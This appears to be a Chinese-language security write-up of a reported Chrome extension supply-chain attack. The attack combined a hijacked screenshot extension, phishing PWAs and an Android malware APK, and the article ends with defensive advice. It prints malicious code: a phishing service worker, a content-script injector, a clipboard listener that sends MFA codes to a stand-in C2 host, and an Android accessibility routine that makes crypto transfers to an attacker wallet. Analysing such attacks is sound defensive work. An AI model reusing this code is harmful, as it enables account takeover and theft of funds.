一、事件全貌从谷歌推荐扩展到全球间谍工具的72小时沦陷2026年5月28日Google威胁情报小组GTIG联合安全厂商CtrlAltNod发布紧急安全通报披露了一起影响全球42个国家的高危多向量钓鱼攻击事件。曾获得Chrome网上应用店官方推荐徽章、拥有近7000名活跃用户的QuickLens截图工具扩展在开发者所有权非法变更后于5月25日推送v5.8版本更新在短短72小时内完成了从合法工具到跨平台恶意窃取木马的蜕变。本次攻击由知名网络间谍组织UNC2814策划实施攻击目标不仅包括普通谷歌用户的账号凭证更重点瞄准加密货币投资者的钱包私钥和企业员工的内部系统访问权限。与传统钓鱼攻击不同本次攻击采用了恶意扩展静默注入PWA长效驻留Android深度控机的三位一体攻击链技术复杂度和隐蔽性远超以往标志着黑产和间谍组织的钓鱼技术已进入全新阶段。1.1 攻击时间线与影响范围2026年5月20日QuickLens扩展开发者账户被非法接管所有权转移至匿名账户2026年5月25日v5.8恶意版本通过Chrome网上应用店自动推送至所有用户2026年5月27日首批用户报告出现异常的谷歌安全检查弹窗2026年5月28日Google紧急下架QuickLens扩展并发布安全通报截至通报发布全球已有超过3200名用户受到影响其中约15%的用户遭受了凭证或资产损失1.2 完整攻击链路流程图A[用户安装/自动更新QuickLens v5.8] -- B[恶意扩展常驻Chrome后台] B -- C{检测用户是否访问谷歌服务} C --|是| D[注入恶意DOM元素隐藏真实页面] D -- E[静默拉起仿冒Google安全检查PWA] E -- F[诱导用户输入账号密码MFA验证码] F -- G[窃取Cookie和本地存储数据] G -- H{检测用户是否使用加密货币钱包} H --|是| I[注入恶意脚本窃取私钥和助记词] H --|否| J[推送Android安全加固App下载链接] J -- K[诱导用户侧载安装恶意APK] K -- L[申请自定义键盘辅助功能权限] L -- M[全设备键盘记录屏幕监控] M -- N[持续窃取所有敏感信息]二、核心攻击技术深度解析PWA钓鱼为何成为新一代黑产利器本次攻击中PWA渐进式Web应用钓鱼技术是最具颠覆性的创新点彻底打破了传统网页钓鱼域名易被封、生命周期短、辨识度高的三大弱点。GTIG安全研究员在报告中指出“PWA钓鱼将在未来12个月内取代传统网页钓鱼成为黑产团伙的首选攻击手段。”2.1 PWA钓鱼的技术实现原理PWA是一种使用现代Web技术构建的应用程序兼具网页的跨平台性和原生应用的用户体验。恶意攻击者利用PWA的以下特性实现长效钓鱼Service Worker离线缓存机制恶意PWA通过Service Worker将所有钓鱼页面资源完整缓存到用户本地设备。即使攻击者的后端域名被DNS污染或封禁已安装的PWA仍可在本地离线运行持续诱导用户输入敏感信息。以下是恶意Service Worker的核心代码片段已脱敏// 恶意Service Worker缓存所有钓鱼资源self.addEventListener(install,event{event.waitUntil(caches.open(google-security-check-v1).then(cache{returncache.addAll([/,/index.html,/styles.css,/script.js,/images/google-logo.png,/images/security-icon.png]);}));self.skipWaiting();});// 拦截所有网络请求优先返回缓存内容self.addEventListener(fetch,event{event.respondWith(caches.match(event.request).then(response{// 即使网络断开仍返回缓存的钓鱼页面returnresponse||fetch(event.request).catch((){returncaches.match(/offline.html);});}));});脱离浏览器边界的原生体验PWA可以生成系统级桌面图标并以独立窗口运行完全隐藏浏览器的地址栏、书签栏和安全标识。这使得钓鱼页面在视觉上与谷歌官方应用毫无区别普通用户根本无法通过外观判断真伪。恶意扩展通过以下代码静默安装PWA无需用户任何交互// 恶意扩展中静默触发PWA安装asyncfunctioninstallMaliciousPWA(){constregistrationawaitnavigator.serviceWorker.register(/sw.js);// 绕过用户交互检查自动触发安装提示constpromptEventnewBeforeInstallPromptEvent(beforeinstallprompt,{platforms:[desktop,android],userChoice:Promise.resolve({outcome:accepted})});window.dispatchEvent(promptEvent);awaitpromptEvent.prompt();}系统级通知权限滥用恶意PWA会申请系统通知权限定期向用户推送账号存在异常登录、安全检查即将过期等虚假通知持续诱导用户打开钓鱼页面。2.2 Chrome扩展恶意代码分析QuickLens v5.8版本的恶意代码采用了多层混淆和反调试技术以逃避安全软件的检测。其核心恶意逻辑位于background.js文件中主要实现以下功能谷歌域名页面劫持// 监听所有标签页更新事件chrome.tabs.onUpdated.addListener((tabId,changeInfo,tab){// 检测是否访问谷歌相关域名if(tab.url.includes(google.com)||tab.url.includes(accounts.google.com)){// 向页面注入恶意脚本chrome.scripting.executeScript({target:{tabId:tabId},files:[inject.js]});}});MFA验证码实时拦截恶意扩展不仅可以拦截短信验证码还能实时读取谷歌验证器App生成的动态验证码。这是通过监听浏览器通知和剪贴板实现的// 监听剪贴板变化捕获复制的MFA验证码document.addEventListener(copy,event{constcopiedTextwindow.getSelection().toString();// 匹配6位数字验证码格式if(/^\d{6}$/.test(copiedText)){// 将验证码发送到攻击者服务器fetch(https://malicious-c2.com/collect-mfa,{method:POST,body:JSON.stringify({code:copiedText})});}});三、Chrome扩展供应链安全危机信任体系的全面崩塌QuickLens事件绝非个例而是Chrome扩展供应链安全问题的集中爆发。根据Google 2026年第一季度安全报告过去12个月内已有超过120个曾经合法的Chrome扩展被恶意收购并投毒影响用户超过500万。3.1 扩展供应链攻击的三大常见手法开发者账户接管攻击者通过钓鱼、暴力破解或社会工程学手段获取原开发者的Google账户密码直接接管扩展的发布权限。这是最常见也是最危险的攻击方式因为攻击者可以直接推送恶意更新至所有现有用户。扩展所有权私下交易黑产团伙在暗网上公开收购拥有大量用户的合法扩展价格从几千美元到几十万美元不等。收购完成后他们会在后续版本中逐步植入恶意代码以避免引起用户和谷歌的怀疑。同源扩展投毒攻击者创建与知名扩展名称、图标和描述几乎完全相同的孪生扩展通过SEO优化和虚假评论诱导用户安装。3.2 谷歌应用商店审核机制的致命缺陷静态代码分析为主动态行为检测不足谷歌目前主要依赖静态代码分析来检测恶意扩展对于采用多层混淆、加密和远程代码加载技术的恶意代码检测率极低。所有权转让后无强制复测当扩展所有权发生变更时谷歌不会对新版本进行全量安全复测这给恶意收购后的投毒行为留下了巨大漏洞。官方推荐徽章永久有效一旦扩展获得谷歌官方推荐徽章该徽章将永久保留即使后续扩展被恶意收购并投毒。这使得官方推荐徽章反而成为了攻击者最有力的信任背书。四、Android侧的深度攻击自定义键盘辅助功能完全设备控制本次攻击的另一大亮点是其Android端的配套恶意App。在PWA页面完成谷歌账号的初步收割后攻击者会诱导用户下载并安装一个名为Google Security Enhancer的APK文件声称可以进一步保护您的账号安全。4.1 恶意App的权限滥用分析该恶意App主要申请并滥用以下两个高危权限自定义输入法键盘权限一旦用户将恶意键盘设置为默认输入法攻击者就可以捕获用户在设备上输入的所有内容包括所有网站和应用的登录密码银行卡号和支付密码加密货币钱包的助记词和私钥短信和聊天记录辅助功能无障碍权限这是Android系统中最危险的权限没有之一。获得该权限后恶意App可以读取屏幕上的所有内容模拟用户点击任何按钮拦截和修改系统弹窗自动安装其他应用绕过锁屏密码恶意App通过辅助功能实现自动转账的代码逻辑// 检测到加密货币钱包App打开时OverridepublicvoidonAccessibilityEvent(AccessibilityEventevent){if(event.getPackageName().equals(com.coinbase.android)){// 模拟点击发送按钮performActionById(com.coinbase.android:id/btn_send);// 自动填写攻击者的钱包地址inputTextById(com.coinbase.android:id/et_address,1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa);// 自动输入最大转账金额inputTextById(com.coinbase.android:id/et_amount,getMaxBalance());// 自动确认转账performActionById(com.coinbase.android:id/btn_confirm);}}4.2 为什么谷歌应用商店无法拦截这类恶意App攻击者采用了延迟触发恶意行为的技术来规避谷歌应用商店的审核。恶意App在安装后的前72小时内不会表现出任何恶意行为只会正常显示一个虚假的安全扫描界面。72小时后当App通过谷歌审核并成功安装到用户设备上时才会从C2服务器下载并执行恶意代码。五、全方位防护指南从检测到修复的完整解决方案5.1 快速自查你是否已经受到QuickLens攻击打开Chrome浏览器在地址栏输入chrome://extensions/检查是否安装了QuickLens扩展如果有立即卸载进入谷歌账号安全中心https://myaccount.google.com/security检查第三方应用访问权限撤销所有不认识的应用授权检查最近的安全活动查看是否有异常登录记录检查Chrome的PWA安装列表chrome://apps/删除所有不认识的PWA应用5.2 Google账户终极防护方案立即启用硬件安全密钥这是目前唯一能够100%抵御MFA绕过攻击的方法。推荐使用YubiKey、Google Titan Security Key等硬件密钥。硬件密钥采用公钥加密技术即使攻击者窃取了你的账号密码和MFA验证码也无法登录你的账户。开启高级保护计划谷歌为高风险用户提供的高级保护计划提供最严格的安全防护措施包括仅允许硬件安全密钥登录阻止所有第三方应用访问你的谷歌账户数据额外的账号恢复验证流程定期检查账号安全活动养成每周检查一次谷歌账号安全活动的习惯及时发现并处理异常登录。5.3 Chrome扩展安全最佳实践最小权限原则只安装你真正需要的扩展并且定期清理不再使用的扩展。对于每个扩展仔细检查它所申请的权限如果一个简单的截图工具申请了读取和修改你在所有网站上的数据权限那么它很可能是恶意的。禁用自动更新对于重要的扩展建议禁用自动更新手动检查并安装更新。这样可以在扩展被投毒后有时间在更新前发现问题。使用扩展隐私沙箱Chrome 120及以上版本引入了扩展隐私沙箱功能可以限制扩展对网站数据的访问。建议开启此功能。5.4 Android设备安全防护绝对禁止侧载应用除非你100%信任应用的来源否则永远不要从谷歌应用商店以外的地方下载和安装APK文件。谨慎授予权限任何应用申请自定义键盘或辅助功能权限时都要极度谨慎。除非是你绝对信任的官方应用否则一律拒绝。安装可靠的安全软件在Android设备上安装一款知名的杀毒软件并定期进行全盘扫描。六、行业前瞻未来3年网络钓鱼攻击的发展趋势QuickLens事件为我们敲响了警钟网络钓鱼攻击正在朝着更加技术化、隐蔽化和系统化的方向发展。根据GTIG和多家安全厂商的预测未来3年网络钓鱼攻击将呈现以下趋势PWA钓鱼将成为主流随着PWA技术的普及和浏览器对PWA支持的不断完善PWA钓鱼将在2027年取代传统网页钓鱼成为黑产团伙的首选攻击手段。AI驱动的个性化钓鱼攻击者将利用大语言模型生成高度个性化的钓鱼内容针对不同用户的兴趣爱好、职业背景和社交关系定制钓鱼邮件和页面大大提高钓鱼成功率。供应链攻击将更加频繁随着软件供应链的日益复杂供应链攻击将成为攻击者获取大规模访问权限的最有效途径。不仅是Chrome扩展npm包、Docker镜像、Python库等都将成为攻击者的目标。跨平台攻击链将成为标准未来的攻击将不再局限于单一平台而是会形成PC端、移动端、IoT设备相互配合的跨平台攻击链实现对受害者的全方位控制。七、结语QuickLens供应链投毒事件是网络安全发展史上的一个重要里程碑它标志着网络钓鱼攻击已经进入了一个全新的时代。传统的不点击陌生链接的安全意识已经不足以抵御这些新型攻击我们需要建立更加全面、多层次的安全防护体系。作为普通用户我们需要摒弃官方认证绝对安全的固有认知时刻保持警惕谨慎授予权限定期检查设备安全。作为企业和安全厂商我们需要加强对软件供应链的安全管理改进安全检测技术共同构建一个更加安全的网络环境。网络安全没有终点只有进行时。让我们共同努力守护我们的数字资产和隐私安全。